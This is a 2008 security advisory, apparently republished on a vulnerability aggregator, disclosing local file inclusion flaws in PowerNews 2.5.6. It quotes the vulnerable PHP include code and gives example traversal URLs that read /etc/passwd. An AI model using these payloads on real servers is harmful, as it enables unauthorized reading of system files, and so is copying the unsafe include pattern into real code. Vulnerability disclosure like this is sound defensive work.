Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19045
HistoryFeb 10, 2008 - 12:00 a.m.

[DSECRG-08-014] Multiple LFI in PowerNews (Newsscript) 2.5.6

2008-02-1000:00:00
vulners.com
23

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-014

Application: PowerNews (Newsscript)
Versions Affected: 2.5.6
Vendor URL: http://www.powerscripts.org/
Bug: Multiple Local File Include
Exploits: YES
Reported: 01.02.2008
Vendor Response: none
Solution: none
Date of Public Advisory: 08.02.2008
Authors: Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description


PowerNews (Newsscript) has Multiple Local File Include vulnerabilities.

  1. Local File Include vulnerabilities found in scripts:

pnadmin/categories.inc.php
pnadmin/news.inc.php
pnadmin/other.inc.php
pnadmin/permissions.inc.php
pnadmin/templates.inc.php
pnadmin/users.inc.php

Non-authentication user can directly access to this scripts.

Code


#################################################

if ($_GET[subpage]) {
if (file_exists($GET[page]."".$_GET[subpage].".inc.php")) {
include($GET[page]."".$_GET[subpage].".inc.php");
} else {
?><center><?PHP echo L_ALL_SUBPAGENOTFOUND; ?></center><?PHP
}
} else {

#################################################

Example:

http://[server]/[installdir]/pnadmin/categories.inc.php?subpage=…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd%00

  1. Local File Include vulnerability found in script pnadmin/index.php in admin area.

Administrator can include local files.

Code


#################################################

if &#40;$pnloggedin != &quot;YES&quot;&#41; {

  include&#40;&quot;login.inc.php&quot;&#41;;

} else {

  if &#40;!$_GET[page]&#41; { $_GET[page] = &quot;main&quot;; }
  if &#40;file_exists&#40;$_GET[page].&quot;.inc.php&quot;&#41;&#41; { include&#40;$_GET[page].&quot;.inc.php&quot;&#41;; } else {

#################################################

Example:

http://[server]/[installdir]/pnadmin/index.php?page=…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd%00

About


Digital Security is leading IT security company in Russia, providing information security consulting, audit and
penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI
DSS standards. Digital Security Research Group focuses on web application and database security problems with
vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)